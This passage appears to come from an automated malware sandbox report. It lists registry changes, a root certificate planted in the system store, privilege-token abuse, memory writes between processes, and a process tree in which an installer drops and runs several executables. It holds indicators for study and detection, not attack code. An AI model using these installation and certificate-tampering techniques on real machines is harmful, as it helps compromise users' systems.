Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe

Modifies registry class 1 IoCs

Processes:

win.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings win.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings	win.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

Processes:

Tue029560e6534e190c.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Tue029560e6534e190c.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Tue029560e6534e190c.exe

Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.

Processes:

description flow ioc

HTTP User-Agent header 329 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

description	flow	ioc
HTTP User-Agent header	329	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exeTue02522f9ea0b1.exeExplorer.EXE

pid	process
1692	powershell.exe
1692	powershell.exe
1664	Tue02522f9ea0b1.exe
1664	Tue02522f9ea0b1.exe
1692	powershell.exe
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 4 IoCs

Processes:

Explorer.EXETue026e182673.exetaskmgr.exenthost.exe

pid process

3020 Explorer.EXE
3624 Tue026e182673.exe
1332 taskmgr.exe
6052 nthost.exe

pid	process
3020	Explorer.EXE
3624	Tue026e182673.exe
1332	taskmgr.exe
6052	nthost.exe

Suspicious behavior: MapViewOfSection 21 IoCs

Processes:

Tue02522f9ea0b1.exeQ9_E6thG7mij2_I43zmvk8Rh.exeWerFault.exeExplorer.EXE

pid	process
1664	Tue02522f9ea0b1.exe
4132	Q9_E6thG7mij2_I43zmvk8Rh.exe
1708	WerFault.exe
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE
3020	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Tue02dc626f48.exeTue02976fcdf1.exeWerFault.exepowershell.exetaskkill.exeExplorer.EXE

description	pid	process
Token: SeCreateTokenPrivilege	3004	Tue02dc626f48.exe
Token: SeAssignPrimaryTokenPrivilege	3004	Tue02dc626f48.exe
Token: SeLockMemoryPrivilege	3004	Tue02dc626f48.exe
Token: SeIncreaseQuotaPrivilege	3004	Tue02dc626f48.exe
Token: SeMachineAccountPrivilege	3004	Tue02dc626f48.exe
Token: SeTcbPrivilege	3004	Tue02dc626f48.exe
Token: SeSecurityPrivilege	3004	Tue02dc626f48.exe
Token: SeTakeOwnershipPrivilege	3004	Tue02dc626f48.exe
Token: SeLoadDriverPrivilege	3004	Tue02dc626f48.exe
Token: SeSystemProfilePrivilege	3004	Tue02dc626f48.exe
Token: SeSystemtimePrivilege	3004	Tue02dc626f48.exe
Token: SeProfSingleProcessPrivilege	3004	Tue02dc626f48.exe
Token: SeIncBasePriorityPrivilege	3004	Tue02dc626f48.exe
Token: SeCreatePagefilePrivilege	3004	Tue02dc626f48.exe
Token: SeCreatePermanentPrivilege	3004	Tue02dc626f48.exe
Token: SeBackupPrivilege	3004	Tue02dc626f48.exe
Token: SeRestorePrivilege	3004	Tue02dc626f48.exe
Token: SeShutdownPrivilege	3004	Tue02dc626f48.exe
Token: SeDebugPrivilege	3004	Tue02dc626f48.exe
Token: SeAuditPrivilege	3004	Tue02dc626f48.exe
Token: SeSystemEnvironmentPrivilege	3004	Tue02dc626f48.exe
Token: SeChangeNotifyPrivilege	3004	Tue02dc626f48.exe
Token: SeRemoteShutdownPrivilege	3004	Tue02dc626f48.exe
Token: SeUndockPrivilege	3004	Tue02dc626f48.exe
Token: SeSyncAgentPrivilege	3004	Tue02dc626f48.exe
Token: SeEnableDelegationPrivilege	3004	Tue02dc626f48.exe
Token: SeManageVolumePrivilege	3004	Tue02dc626f48.exe
Token: SeImpersonatePrivilege	3004	Tue02dc626f48.exe
Token: SeCreateGlobalPrivilege	3004	Tue02dc626f48.exe
Token: 31	3004	Tue02dc626f48.exe
Token: 32	3004	Tue02dc626f48.exe
Token: 33	3004	Tue02dc626f48.exe
Token: 34	3004	Tue02dc626f48.exe
Token: 35	3004	Tue02dc626f48.exe
Token: SeDebugPrivilege	1632	Tue02976fcdf1.exe
Token: SeDebugPrivilege	3120	WerFault.exe
Token: SeDebugPrivilege	1692	powershell.exe
Token: SeDebugPrivilege	4792	taskkill.exe
Token: SeShutdownPrivilege	3020	Explorer.EXE
Token: SeCreatePagefilePrivilege	3020	Explorer.EXE
Token: SeShutdownPrivilege	3020	Explorer.EXE
Token: SeCreatePagefilePrivilege	3020	Explorer.EXE
Token: SeShutdownPrivilege	3020	Explorer.EXE
Token: SeCreatePagefilePrivilege	3020	Explorer.EXE
Token: SeShutdownPrivilege	3020	Explorer.EXE
Token: SeCreatePagefilePrivilege	3020	Explorer.EXE
Token: SeShutdownPrivilege	3020	Explorer.EXE
Token: SeCreatePagefilePrivilege	3020	Explorer.EXE
Token: SeShutdownPrivilege	3020	Explorer.EXE
Token: SeCreatePagefilePrivilege	3020	Explorer.EXE
Token: SeShutdownPrivilege	3020	Explorer.EXE
Token: SeCreatePagefilePrivilege	3020	Explorer.EXE
Token: SeShutdownPrivilege	3020	Explorer.EXE
Token: SeCreatePagefilePrivilege	3020	Explorer.EXE
Token: SeShutdownPrivilege	3020	Explorer.EXE
Token: SeCreatePagefilePrivilege	3020	Explorer.EXE
Token: SeShutdownPrivilege	3020	Explorer.EXE
Token: SeCreatePagefilePrivilege	3020	Explorer.EXE
Token: SeShutdownPrivilege	3020	Explorer.EXE
Token: SeCreatePagefilePrivilege	3020	Explorer.EXE
Token: SeShutdownPrivilege	3020	Explorer.EXE
Token: SeCreatePagefilePrivilege	3020	Explorer.EXE
Token: SeShutdownPrivilege	3020	Explorer.EXE
Token: SeCreatePagefilePrivilege	3020	Explorer.EXE

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

taskmgr.exeExplorer.EXESta.exe.pif

pid	process
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
3020	Explorer.EXE
3020	Explorer.EXE
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
5224	Sta.exe.pif
3020	Explorer.EXE
3020	Explorer.EXE
5224	Sta.exe.pif
5224	Sta.exe.pif
3020	Explorer.EXE
3020	Explorer.EXE
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

taskmgr.exeExplorer.EXESta.exe.pif

pid	process
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
3020	Explorer.EXE
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
5224	Sta.exe.pif
5224	Sta.exe.pif
5224	Sta.exe.pif
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe
1332	taskmgr.exe

Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

zhangyan.exezhangyan.exeLI3FA3IG15M57IM.exe

pid process

4092 zhangyan.exe
4092 zhangyan.exe
5732 zhangyan.exe
5732 zhangyan.exe
1472 LI3FA3IG15M57IM.exe
1472 LI3FA3IG15M57IM.exe

pid	process
4092	zhangyan.exe
4092	zhangyan.exe
5732	zhangyan.exe
5732	zhangyan.exe
1472	LI3FA3IG15M57IM.exe
1472	LI3FA3IG15M57IM.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

setup_x86_x64_install.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1420 wrote to memory of 2368	1420	setup_x86_x64_install.exe	setup_installer.exe
PID 1420 wrote to memory of 2368	1420	setup_x86_x64_install.exe	setup_installer.exe
PID 1420 wrote to memory of 2368	1420	setup_x86_x64_install.exe	setup_installer.exe
PID 2368 wrote to memory of 2088	2368	setup_installer.exe	setup_install.exe
PID 2368 wrote to memory of 2088	2368	setup_installer.exe	setup_install.exe
PID 2368 wrote to memory of 2088	2368	setup_installer.exe	setup_install.exe
PID 2088 wrote to memory of 3988	2088	setup_install.exe	cmd.exe
PID 2088 wrote to memory of 3988	2088	setup_install.exe	cmd.exe
PID 2088 wrote to memory of 3988	2088	setup_install.exe	cmd.exe
PID 2088 wrote to memory of 1760	2088	setup_install.exe	cmd.exe
PID 2088 wrote to memory of 1760	2088	setup_install.exe	cmd.exe
PID 2088 wrote to memory of 1760	2088	setup_install.exe	cmd.exe
PID 2088 wrote to memory of 2204	2088	setup_install.exe	cmd.exe
PID 2088 wrote to memory of 2204	2088	setup_install.exe	cmd.exe
PID 2088 wrote to memory of 2204	2088	setup_install.exe	cmd.exe
PID 2088 wrote to memory of 2032	2088	setup_install.exe	cmd.exe
PID 2088 wrote to memory of 2032	2088	setup_install.exe	cmd.exe
PID 2088 wrote to memory of 2032	2088	setup_install.exe	cmd.exe
PID 2088 wrote to memory of 4092	2088	setup_install.exe	cmd.exe
PID 2088 wrote to memory of 4092	2088	setup_install.exe	cmd.exe
PID 2088 wrote to memory of 4092	2088	setup_install.exe	cmd.exe
PID 2088 wrote to memory of 1336	2088	setup_install.exe	cmd.exe
PID 2088 wrote to memory of 1336	2088	setup_install.exe	cmd.exe
PID 2088 wrote to memory of 1336	2088	setup_install.exe	cmd.exe
PID 2088 wrote to memory of 760	2088	setup_install.exe	cmd.exe
PID 2088 wrote to memory of 760	2088	setup_install.exe	cmd.exe
PID 2088 wrote to memory of 760	2088	setup_install.exe	cmd.exe
PID 2088 wrote to memory of 884	2088	setup_install.exe	cmd.exe
PID 2088 wrote to memory of 884	2088	setup_install.exe	cmd.exe
PID 2088 wrote to memory of 884	2088	setup_install.exe	cmd.exe
PID 2088 wrote to memory of 1472	2088	setup_install.exe	cmd.exe
PID 2088 wrote to memory of 1472	2088	setup_install.exe	cmd.exe
PID 2088 wrote to memory of 1472	2088	setup_install.exe	cmd.exe
PID 2088 wrote to memory of 3296	2088	setup_install.exe	cmd.exe
PID 2088 wrote to memory of 3296	2088	setup_install.exe	cmd.exe
PID 2088 wrote to memory of 3296	2088	setup_install.exe	cmd.exe
PID 2088 wrote to memory of 2120	2088	setup_install.exe	cmd.exe
PID 2088 wrote to memory of 2120	2088	setup_install.exe	cmd.exe
PID 2088 wrote to memory of 2120	2088	setup_install.exe	cmd.exe
PID 2088 wrote to memory of 1348	2088	setup_install.exe	cmd.exe
PID 2088 wrote to memory of 1348	2088	setup_install.exe	cmd.exe
PID 2088 wrote to memory of 1348	2088	setup_install.exe	cmd.exe
PID 1348 wrote to memory of 3888	1348	cmd.exe	Tue0289c99651.exe
PID 1348 wrote to memory of 3888	1348	cmd.exe	Tue0289c99651.exe
PID 2032 wrote to memory of 1632	2032	cmd.exe	Tue02976fcdf1.exe
PID 2032 wrote to memory of 1632	2032	cmd.exe	Tue02976fcdf1.exe
PID 1336 wrote to memory of 3004	1336	cmd.exe	Tue02dc626f48.exe
PID 1336 wrote to memory of 3004	1336	cmd.exe	Tue02dc626f48.exe
PID 1336 wrote to memory of 3004	1336	cmd.exe	Tue02dc626f48.exe
PID 2204 wrote to memory of 1560	2204	cmd.exe	Tue028a363eda.exe
PID 2204 wrote to memory of 1560	2204	cmd.exe	Tue028a363eda.exe
PID 2204 wrote to memory of 1560	2204	cmd.exe	Tue028a363eda.exe
PID 884 wrote to memory of 3120	884	cmd.exe	Tue02705f9c2b455.exe
PID 884 wrote to memory of 3120	884	cmd.exe	Tue02705f9c2b455.exe
PID 3988 wrote to memory of 1692	3988	cmd.exe	powershell.exe
PID 3988 wrote to memory of 1692	3988	cmd.exe	powershell.exe
PID 3988 wrote to memory of 1692	3988	cmd.exe	powershell.exe
PID 1760 wrote to memory of 1664	1760	cmd.exe	Tue02522f9ea0b1.exe
PID 1760 wrote to memory of 1664	1760	cmd.exe	Tue02522f9ea0b1.exe
PID 1760 wrote to memory of 1664	1760	cmd.exe	Tue02522f9ea0b1.exe
PID 1472 wrote to memory of 3932	1472	cmd.exe	Tue02b2110095fe706.exe
PID 1472 wrote to memory of 3932	1472	cmd.exe	Tue02b2110095fe706.exe
PID 1472 wrote to memory of 3932	1472	cmd.exe	Tue02b2110095fe706.exe
PID 3296 wrote to memory of 3624	3296	cmd.exe	Tue026e182673.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3020

C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1420

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2368

C:\Users\Admin\AppData\Local\Temp\7zS049B1F6D\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS049B1F6D\setup_install.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2088

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue02976fcdf1.exe
5⤵
- Suspicious use of WriteProcessMemory
PID:2032

C:\Users\Admin\AppData\Local\Temp\7zS049B1F6D\Tue02976fcdf1.exe
Tue02976fcdf1.exe
6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1632

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue0289c99651.exe
5⤵
- Suspicious use of WriteProcessMemory
PID:1348

C:\Users\Admin\AppData\Local\Temp\7zS049B1F6D\Tue0289c99651.exe
Tue0289c99651.exe
6⤵
- Executes dropped EXE
PID:3888

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue029560e6534e190c.exe
5⤵
PID:2120

C:\Users\Admin\AppData\Local\Temp\7zS049B1F6D\Tue029560e6534e190c.exe
Tue029560e6534e190c.exe
6⤵
- Executes dropped EXE
- Modifies system certificate store
PID:1828

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1828 -s 1780
7⤵
- Program crash
PID:1932

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue026e182673.exe /mixone
5⤵
- Suspicious use of WriteProcessMemory
PID:3296

C:\Users\Admin\AppData\Local\Temp\7zS049B1F6D\Tue026e182673.exe
Tue026e182673.exe /mixone
6⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
PID:3624

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3624 -s 456
7⤵
- Program crash
PID:5020

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3624 -s 656
7⤵
- Program crash
PID:4468

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3624 -s 748
7⤵
- Program crash
PID:4664

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3624 -s 788
7⤵
- Program crash
PID:4300

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3624 -s 668
7⤵
- Program crash
PID:3532

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3624 -s 876
7⤵
- Program crash
PID:3404

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3624 -s 1052
7⤵
- Program crash
PID:3628

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3624 -s 1120
7⤵
- Program crash
PID:3004

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3624 -s 1292
7⤵
- Program crash
PID:2280

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3624 -s 780
7⤵
- Program crash
PID:5724

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3624 -s 628
7⤵
- Program crash
PID:1544

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3624 -s 1260
7⤵
- Program crash
PID:5040

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3624 -s 756
7⤵
- Program crash
PID:2020

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue02b2110095fe706.exe
5⤵
- Suspicious use of WriteProcessMemory
PID:1472

C:\Users\Admin\AppData\Local\Temp\7zS049B1F6D\Tue02b2110095fe706.exe
Tue02b2110095fe706.exe
6⤵
- Executes dropped EXE
PID:3932

C:\Users\Admin\AppData\Local\Temp\is-B64KF.tmp\Tue02b2110095fe706.tmp
"C:\Users\Admin\AppData\Local\Temp\is-B64KF.tmp\Tue02b2110095fe706.tmp" /SL5="$7004E,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS049B1F6D\Tue02b2110095fe706.exe"
7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4284

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue02705f9c2b455.exe
5⤵
- Suspicious use of WriteProcessMemory
PID:884

C:\Users\Admin\AppData\Local\Temp\7zS049B1F6D\Tue02705f9c2b455.exe
Tue02705f9c2b455.exe
6⤵
- Executes dropped EXE
PID:3120

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue026e94a5005f8.exe
5⤵
PID:760

C:\Users\Admin\AppData\Local\Temp\7zS049B1F6D\Tue026e94a5005f8.exe
Tue026e94a5005f8.exe
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2188

C:\Users\Admin\AppData\Local\Temp\7zS049B1F6D\Tue026e94a5005f8.exe
C:\Users\Admin\AppData\Local\Temp\7zS049B1F6D\Tue026e94a5005f8.exe
7⤵
- Executes dropped EXE
PID:4696

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue02dc626f48.exe
5⤵
- Suspicious use of WriteProcessMemory
PID:1336

C:\Users\Admin\AppData\Local\Temp\7zS049B1F6D\Tue02dc626f48.exe
Tue02dc626f48.exe
6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3004

C:\Windows\SysWOW64\cmd.exe
